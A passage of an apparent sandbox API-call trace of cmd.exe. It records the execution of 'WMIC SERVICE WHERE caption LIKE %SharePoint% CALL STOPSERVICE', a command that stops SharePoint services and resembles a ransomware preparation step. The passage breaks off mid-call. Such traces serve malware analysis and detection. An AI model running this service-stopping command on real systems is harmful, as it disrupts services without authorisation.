lpValueName="CompletionChar", lpReserved=0x0, lpType=0x47fed64, lpData=0x47fed6c, lpcbData=0x47fed68*=0x1000 | out: lpType=0x47fed64*=0x4, lpData=0x47fed6c*=0x9, lpcbData=0x47fed68*=0x4) returned 0x0 [0111.324] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x47fed64, lpData=0x47fed6c, lpcbData=0x47fed68*=0x1000 | out: lpType=0x47fed64*=0x4, lpData=0x47fed6c*=0x9, lpcbData=0x47fed68*=0x4) returned 0x0 [0111.324] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x47fed64, lpData=0x47fed6c, lpcbData=0x47fed68*=0x1000 | out: lpType=0x47fed64*=0x0, lpData=0x47fed6c*=0x9, lpcbData=0x47fed68*=0x1000) returned 0x2 [0111.324] RegCloseKey (hKey=0x94) returned 0x0 [0111.324] time (in: timer=0x0 | out: timer=0x0) returned 0x5ad29820 [0111.324] srand (_Seed=0x5ad29820) [0111.324] GetCommandLineW () returned="/c WMIC SERVICE WHERE 'caption LIKE '%SharePoint%'' CALL STOPSERVICE" [0111.324] GetCommandLineW () returned="/c WMIC SERVICE WHERE 'caption LIKE '%SharePoint%'' CALL STOPSERVICE" [0111.324] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0111.324] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4b59d38, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0111.324] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0111.324] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0111.324] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0111.324] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0111.324] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0111.324] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0111.325] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0111.325] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0111.325] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0111.325] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0111.325] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0111.325] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0111.325] GetEnvironmentStringsW () returned 0x4b57de0* [0111.325] FreeEnvironmentStringsA (penv="A") returned 1 [0111.325] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0111.325] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0111.325] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0111.325] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0111.325] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0111.325] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0111.325] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0111.325] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0111.325] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0111.325] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0111.325] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x47ffb38 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0111.325] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x47ffb38, lpFilePart=0x47ffb30 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x47ffb30*="Desktop") returned 0x1d [0111.325] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0111.325] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x47ff8b8 | out: lpFindFileData=0x47ff8b8) returned 0x4b505c8 [0111.326] FindClose (in: hFindFile=0x4b505c8 | out: hFindFile=0x4b505c8) returned 1 [0111.326] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x47ff8b8 | out: lpFindFileData=0x47ff8b8) returned 0x4b505c8 [0111.326] FindClose (in: hFindFile=0x4b505c8 | out: hFindFile=0x4b505c8) returned 1 [0111.326] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0111.326] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x47ff8b8 | out: lpFindFileData=0x47ff8b8) returned 0x4b505c8 [0111.326] FindClose (in: hFindFile=0x4b505c8 | out: hFindFile=0x4b505c8) returned 1 [0111.326] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0111.326] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0111.326] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0111.326] GetEnvironmentStringsW () returned 0x4b57de0* [0111.326] FreeEnvironmentStringsA (penv="=") returned 1 [0111.326] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0111.327] GetConsoleOutputCP () returned 0x1b5 [0111.327] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0111.327] GetUserDefaultLCID () returned 0x409 [0111.327] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x3f24a0, cchData=8 | out: lpLCData=":") returned 2 [0111.327] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x47ffc68, cchData=128 | out: lpLCData="0") returned 2 [0111.327] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x47ffc68, cchData=128 | out: lpLCData="0") returned 2 [0111.327] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x47ffc68, cchData=128 | out: lpLCData="1") returned 2 [0111.327] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x3f24b0, cchData=8 | out: lpLCData="/") returned 2 [0111.327] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x3f2500, cchData=32 | out: lpLCData="Mon") returned 4 [0111.327] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x3f2540, cchData=32 | out: lpLCData="Tue") returned 4 [0111.327] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x3f2580, cchData=32 | out: lpLCData="Wed") returned 4 [0111.327] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x3f25c0, cchData=32 | out: lpLCData="Thu") returned 4 [0111.327] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x3f2600, cchData=32 | out: lpLCData="Fri") returned 4 [0111.327] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x3f2640, cchData=32 | out: lpLCData="Sat") returned 4 [0111.327] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x3f2680, cchData=32 | out: lpLCData="Sun") returned 4 [0111.327] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x3f24c0, cchData=8 | out: lpLCData=".") returned 2 [0111.327] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x3f24e0, cchData=8 | out: lpLCData=",") returned 2 [0111.327] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0111.328] GetConsoleTitleW (in: lpConsoleTitle=0x4b5aab0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0111.328] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0111.328] GetProcAddress (hModule=0x77670000, lpProcName="CopyFileExW") returned 0x7768fa80 [0111.328] GetProcAddress (hModule=0x77670000, lpProcName="IsDebuggerPresent") returned 0x7768a790 [0111.328] GetProcAddress (hModule=0x77670000, lpProcName="SetConsoleInputExeNameW") returned 0x76a835c0 [0111.329] GetEnvironmentVariableW (in: lpName="SharePoint", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0111.329] _wcsicmp (_String1="SharePoint", _String2="CD") returned 16 [0111.329] _wcsicmp (_String1="SharePoint", _String2="ERRORLEVEL") returned 14 [0111.329] _wcsicmp (_String1="SharePoint", _String2="CMDEXTVERSION") returned 16 [0111.329] _wcsicmp (_String1="SharePoint", _String2="CMDCMDLINE") returned 16 [0111.329] _wcsicmp (_String1="SharePoint", _String2="DATE") returned 15 [0111.329] _wcsicmp (_String1="SharePoint", _String2="TIME") returned -1 [0111.329] _wcsicmp (_String1="SharePoint", _String2="RANDOM") returned 1 [0111.329] _wcsicmp (_String1="SharePoint", _String2="HIGHESTNUMANODENUMBER") returned 11 [0111.329] _wcsicmp (_String1="WMIC", _String2=")") returned 78 [0111.329] _wcsicmp (_String1="FOR", _String2="WMIC") returned -17 [0111.329] _wcsicmp (_String1="FOR/?", _String2="WMIC") returned -17 [0111.329] _wcsicmp (_String1="IF", _String2="WMIC") returned -14 [0111.329] _wcsicmp (_String1="IF/?", _String2="WMIC") returned -14 [0111.329] _wcsicmp (_String1="REM", _String2="WMIC") returned -5 [0111.329] _wcsicmp (_String1="REM/?", _String2="WMIC") returned -5 [0111.331] GetConsoleTitleW (in: lpConsoleTitle=0x47ff950, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0111.331] _wcsicmp (_String1="WMIC", _String2="DIR") returned 19 [0111.331] _wcsicmp (_String1="WMIC", _String2="ERASE") returned 18 [0111.331] _wcsicmp (_String1="WMIC", _String2="DEL") returned 19 [0111.331] _wcsicmp (_String1="WMIC", _String2="TYPE") returned 3 [0111.331] _wcsicmp (_String1="WMIC", _String2="COPY") returned 20 [0111.331] _wcsicmp (_String1="WMIC", _String2="CD") returned 20 [0111.331] _wcsicmp (_String1="WMIC", _String2="CHDIR") returned 20 [0111.331] _wcsicmp (_String1="WMIC", _String2="RENAME") returned 5 [0111.331] _wcsicmp (_String1="WMIC", _String2="REN") returned 5 [0111.331] _wcsicmp (_String1="WMIC", _String2="ECHO") returned 18 [0111.331] _wcsicmp (_String1="WMIC", _String2="SET") returned 4 [0111.331] _wcsicmp (_String1="WMIC", _String2="PAUSE") returned 7 [0111.331] _wcsicmp (_String1="WMIC", _String2="DATE") returned 19 [0111.331] _wcsicmp (_String1="WMIC", _String2="TIME") returned 3 [0111.331] _wcsicmp (_String1="WMIC", _String2="PROMPT") returned 7 [0111.331] _wcsicmp (_String1="WMIC", _String2="MD") returned 10 [0111.331] _wcsicmp (_String1="WMIC", _String2="MKDIR") returned 10 [0111.331] _wcsicmp (_String1="WMIC", _String2="RD") returned 5 [0111.331] _wcsicmp (_String1="WMIC", _String2="RMDIR") returned 5 [0111.331] _wcsicmp (_String1="WMIC", _String2="PATH") returned 7 [0111.331] _wcsicmp (_String1="WMIC", _String2="GOTO") returned 16 [0111.331] _wcsicmp (_String1="WMIC", _String2="SHIFT") returned 4 [0111.331] _wcsicmp (_String1="WMIC", _String2="CLS") returned 20 [0111.331] _wcsicmp (_String1="WMIC", _String2="CALL") returned 20 [0111.331] _wcsicmp (_String1="WMIC", _String2="VERIFY") returned 1 [0111.331] _wcsicmp (_String1="WMIC", _String2="VER") returned 1 [0111.331] _wcsicmp (_String1="WMIC", _String2="VOL") returned 1 [0111.331] _wcsicmp (_String1="WMIC", _String2="EXIT") returned 18 [0111.332] _wcsicmp (_String1="WMIC", _String2="SETLOCAL") returned 4 [0111.332] _wcsicmp (_String1="WMIC", _String2="ENDLOCAL") returned 18 [0111.332] _wcsicmp (_String1="WMIC", _String2="TITLE") returned 3 [0111.332] _wcsicmp (_String1="WMIC", _String2="START") returned 4 [0111.332] _wcsicmp (_String1="WMIC", _String2="DPATH") returned 19 [0111.332] _wcsicmp (_String1="WMIC", _String2="KEYS") returned 12 [0111.332] _wcsicmp (_String1="WMIC", _String2="MOVE") returned 10 [0111.332] _wcsicmp (_String1="WMIC", _String2="PUSHD") returned 7 [0111.332] _wcsicmp (_String1="WMIC", _String2="POPD") returned 7 [0111.332] _wcsicmp (_String1="WMIC", _String2="ASSOC") returned 22 [0111.332] _wcsicmp (_String1="WMIC", _String2="FTYPE") returned 17 [0111.332] _wcsicmp (_String1="WMIC", _String2="BREAK") returned 21 [0111.332] _wcsicmp (_String1="WMIC", _String2="COLOR") returned 20 [0111.332] _wcsicmp (_String1="WMIC", _String2="MKLINK") returned 10 [0111.332] _wcsicmp (_String1="WMIC", _String2="DIR") returned 19 [0111.332] _wcsicmp (_String1="WMIC", _String2="ERASE") returned 18 [0111.332] _wcsicmp (_String1="WMIC", _String2="DEL") returned 19 [0111.332] _wcsicmp (_String1="WMIC", _String2="TYPE") returned 3 [0111.332] _wcsicmp (_String1="WMIC", _String2="COPY") returned 20 [0111.332] _wcsicmp (_String1="WMIC", _String2="CD") returned 20 [0111.332] _wcsicmp (_String1="WMIC", _String2="CHDIR") returned 20 [0111.332] _wcsicmp (_String1="WMIC", _String2="RENAME") returned 5 [0111.332] _wcsicmp (_String1="WMIC", _String2="REN") returned 5 [0111.332] _wcsicmp (_String1="WMIC", _String2="ECHO") returned 18 [0111.332] _wcsicmp (_String1="WMIC", _String2="SET") returned 4 [0111.332] _wcsicmp (_String1="WMIC", _String2="PAUSE") returned 7 [0111.332] _wcsicmp (_String1="WMIC", _String2="DATE") returned 19 [0111.332] _wcsicmp (_String1="WMIC", _String2="TIME") returned 3 [0111.332] _wcsicmp (_String1="WMIC", _String2="PROMPT") returned 7 [0111.332] _wcsicmp (_String1="WMIC", _String2="MD") returned 10 [0111.332] _wcsicmp (_String1="WMIC", _String2="MKDIR") returned 10 [0111.332] _wcsicmp (_String1="WMIC", _String2="RD") returned 5 [0111.332] _wcsicmp (_String1="WMIC", _String2="RMDIR") returned 5 [0111.332] _wcsicmp (_String1="WMIC", _String2="PATH") returned 7 [0111.332] _wcsicmp (_String1="WMIC", _String2="GOTO") returned 16 [0111.332] _wcsicmp (_String1="WMIC", _String2="SHIFT") returned 4 [0111.332] _wcsicmp (_String1="WMIC", _String2="CLS") returned 20 [0111.332] _wcsicmp (_String1="WMIC", _String2="CALL") returned 20 [0111.332] _wcsicmp (_String1="WMIC", _String2="VERIFY") returned 1 [0111.332] _wcsicmp (_String1="WMIC", _String2="VER") returned 1 [0111.332] _wcsicmp (_String1="WMIC", _String2="VOL") returned 1 [0111.332] _wcsicmp (_String1="WMIC", _String2="EXIT") returned 18 [0111.332] _wcsicmp (_String1="WMIC", _String2="SETLOCAL") returned 4 [0111.333] _wcsicmp (_String1="WMIC", _String2="ENDLOCAL") returned 18 [0111.333] _wcsicmp (_String1="WMIC", _String2="TITLE") returned 3 [0111.333] _wcsicmp (_String1="WMIC", _String2="START") returned 4 [0111.333] _wcsicmp (_String1="WMIC", _String2="DPATH") returned 19 [0111.333] _wcsicmp (_String1="WMIC", _String2="KEYS") returned 12 [0111.333] _wcsicmp (_String1="WMIC", _String2="MOVE") returned 10 [0111.333] _wcsicmp (_String1="WMIC", _String2="PUSHD") returned 7 [0111.333] _wcsicmp (_String1="WMIC", _String2="POPD") returned 7 [0111.333] _wcsicmp (_String1="WMIC", _String2="ASSOC") returned 22 [0111.333] _wcsicmp (_String1="WMIC", _String2="FTYPE") returned 17 [0111.333] _wcsicmp (_String1="WMIC", _String2="BREAK") returned 21 [0111.333] _wcsicmp (_String1="WMIC", _String2="COLOR") returned 20 [0111.333] _wcsicmp (_String1="WMIC", _String2="MKLINK") returned 10 [0111.333] _wcsicmp (_String1="WMIC", _String2="FOR") returned 17 [0111.333] _wcsicmp (_String1="WMIC", _String2="IF") returned 14 [0111.333] _wcsicmp (_String1="WMIC", _String2="REM") returned 5 [0111.333] _wcsnicmp (_String1="WMIC", _String2="cmd ", _MaxCount=0x4) returned 20 [0111.333] SetErrorMode (uMode=0x0) returned 0x0 [0111.333] SetErrorMode (uMode=0x1) returned 0x0 [0111.333] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4b505d0, lpFilePart=0x47ff45c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x47ff45c*="Desktop") returned 0x1d [0111.333] SetErrorMode (uMode=0x0) returned 0x1 [0111.334] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0111.334] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0111.340] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0111.341] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0111.342] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x47ff1e8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x47ff1e8) returned 0xffffffff [0111.342] GetLastError () returned 0x2 [0111.342] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0111.342] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x47ff1e8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x47ff1e8) returned 0xffffffff [0111.342] GetLastError () returned 0x2 [0111.342] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0111.342] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x47ff1e8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x47ff1e8) returned 0xffffffff [0111.342] GetLastError () returned 0x2 [0111.342] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0111.342] FindFirstFileExW (in: lpFileName="C:\\Windows\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x47ff1e8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x47ff1e8) returned 0xffffffff [0111.342] GetLastError () returned 0x2 [0111.342] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0111.343] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x47ff1e8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x47ff1e8) returned 0x4b5b248 [0111.343] FindClose (in: hFindFile=0x4b5b248 | out: hFindFile=0x4b5b248) returned 1 [0111.343] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.COM", fInfoLevelId=0x1, lpFindFileData=0x47ff1e8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x47ff1e8) returned 0xffffffff [0111.343] GetLastError () returned 0x2 [0111.343] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.EXE", fInfoLevelId=0x1, lpFindFileData=0x47ff1e8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x47ff1e8) returned 0x4b5b248 [0111.343] FindClose (in: hFindFile=0x4b5b248 | out: hFindFile=0x4b5b248) returned 1 [0111.343] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0111.343] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0111.343] GetConsoleTitleW (in: lpConsoleTitle=0x47ff6dc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0111.343] InitializeProcThreadAttributeList (in: lpAttributeList=0x47ff608, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x47ff5ec | out: lpAttributeList=0x47ff608, lpSize=0x47ff5ec) returned 1 [0111.343] UpdateProcThreadAttribute (in: lpAttributeList=0x47ff608, dwFlags=0x0, Attribute=0x60001, lpValue=0x47ff5f4, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x47ff608, lpPreviousValue=0x0) returned 1 [0111.343] GetStartupInfoW (in: lpStartupInfo=0x47ff640 | out: lpStartupInfo=0x47ff640*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0111.343] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0111.343] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0111.344] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0111.344] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0111.344] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0111.344] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0111.344] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0111.344] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0111.344] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0111.344] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0111.344] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0111.344] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0111.344] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0111.344] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0111.344] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0111.344] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0111.344] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0111.344] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0111.344] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0111.344] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0111.344] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0111.344] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0111.344] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0111.344] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0111.344] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0111.344] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0111.344] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0111.344] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0111.344] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0111.344] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0111.344] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0111.344] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0111.344] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0111.344] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0111.344] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0111.344] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0111.344] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0111.344] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0111.344] lstrcmpW (lpString1="\\WMIC.exe", lpString2="\\XCOPY.EXE") returned -1 [0111.345] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\Wbem\\WMIC.exe", lpCommandLine="WMIC SERVICE WHERE 'caption LIKE '%SharePoint%'' CALL STOPSERVICE", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x47ff590*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="WMIC SERVICE WHERE 'caption LIKE '%SharePoint%'' CALL STOPSERVICE", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x47ff5dc | out: lpCommandLine="WMIC SERVICE WHERE 'caption LIKE '%SharePoint%'' CALL STOPSERVICE", lpProcessInformation=0x47ff5dc*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xe34, dwThreadId=0xe38)) returned 1 [0111.352] CloseHandle (hObject=0xa4) returned 1 [0111.352] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0111.352] GetEnvironmentStringsW () returned 0x4b59f48* [0111.352] FreeEnvironmentStringsA (penv="=") returned 1 [0111.352] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0112.342] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x47ff574 | out: lpExitCode=0x47ff574*=0x0) returned 1 [0112.342] CloseHandle (hObject=0xa8) returned 1 [0112.342] _vsnwprintf (in: _Buffer=0x47ff65c, _BufferCount=0x13, _Format="%08X", _ArgList=0x47ff57c | out: _Buffer="00000000") returned 8 [0112.342] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0112.342] GetEnvironmentStringsW () returned 0x4b57de0* [0112.342] FreeEnvironmentStringsA (penv="=") returned 1 [0112.342] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0112.342] GetEnvironmentStringsW () returned 0x4b57de0* [0112.342] FreeEnvironmentStringsA (penv="=") returned 1 [0112.342] DeleteProcThreadAttributeList (in: lpAttributeList=0x47ff608 | out: lpAttributeList=0x47ff608) [0112.342] _get_osfhandle (_FileHandle=1) returned 0x3c [0112.342] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0112.343] _get_osfhandle (_FileHandle=1) returned 0x3c [0112.343] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0112.343] _get_osfhandle (_FileHandle=0) returned 0x38 [0112.343] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0112.343] SetConsoleInputExeNameW () returned 0x1 [0112.343] GetConsoleOutputCP () returned 0x1b5 [0112.343] GetCPInfo (in: 